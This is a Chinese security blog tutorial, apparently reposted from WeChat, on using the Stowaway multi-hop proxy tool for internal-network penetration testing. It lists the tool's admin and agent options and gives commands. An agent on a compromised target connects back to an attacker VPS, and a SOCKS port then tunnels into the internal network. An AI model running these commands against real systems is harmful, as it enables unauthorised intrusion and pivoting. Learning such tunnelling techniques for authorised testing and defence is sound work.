本文章仅供学习交流使用,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。请尊重原创,可以相互学习,虽说是记录生活,但也反感被人拿去盈利。
1.工具介绍
Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具
用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能。
下载地址:https://github.com/ph4ntonn/Stowaway
一个小提示:内网穿透的时候,多换换几个工具试试,不要只盯着一个工具...
正文
Stowaway有两种角色,admin端和agent端。admin端就是我们的vps机器,agent端就是我们拿到的靶标。
admin端:1.xxx.xxx.233 亚洲 中国 广州 广州腾讯云
agent端:111.xxx.xxx.198 亚洲 中国 上海 上海 腾讯云
admin端
参数:-l 被动模式下的监听地址[ip]:<port>-s 节点通信加密密钥,所有节点(admin&&agent)必须一致-c 主动模式下的目标节点地址--socks5-proxy socks5代理服务器地址--socks5-proxyu socks5代理服务器用户名(可选)--socks5-proxyp socks5代理服务器密码(可选)--http-proxy http代理服务器地址--down 下游协议类型,默认为裸TCP流量,可选HTTP/WS--tls-enable 为节点通信启用TLS,在启用TLS后,AES加密将被禁用--domain 指定TLS SNI域名,若为空,默认为目标节点地址--heartbeat 开启心跳包
agent端
参数:-l 被动模式下的监听地址[ip]:<port>-s 节点通信加密密钥-c 主动模式下的目标节点地址--socks5-proxy socks5代理服务器地址--socks5-proxyu socks5代理服务器用户名(可选)--socks5-proxyp socks5代理服务器密码(可选)--http-proxy http代理服务器地址--reconnect 重连时间间隔--rehost 端口复用时复用的IP地址--report 端口复用时复用的端口号--up 上游协议类型,默认为裸TCP流量,可选HTTP/WS--down 下游协议类型,默认为裸TCP流量,可选HTTP/WS--cs 运行平台的shell编码类型,默认为utf-8,可选gbk--tls-enable 为节点通信启用TLS,在启用TLS后,AES加密将被禁用--domain 指定TLS SNI域名,若为空,默认为目标节点地址
实例运用
-
admin端开放端口,等待agent连接过来
./linux_x64_admin -l 9999 -s 1234vps上开放9999端口,密码1234
agent端进行连接
./linux_x64_agent -c 1.xxx.xxx.233:9999 -s 1234 admin端收到
admin设置socks端口端口,即可通过vps--到靶标里面去了
detailuse 0socks 1080
穿透成功 设置代理 admin端:1.xxx.xxx.233 1080端口
本文章仅供学习交流使用,文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。请尊重原创,可以相互学习,虽说是记录生活,但也反感被人拿去盈利。
原文始发于微信公众号(Feng随心而安):内网穿透学习-10-Stowaway工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论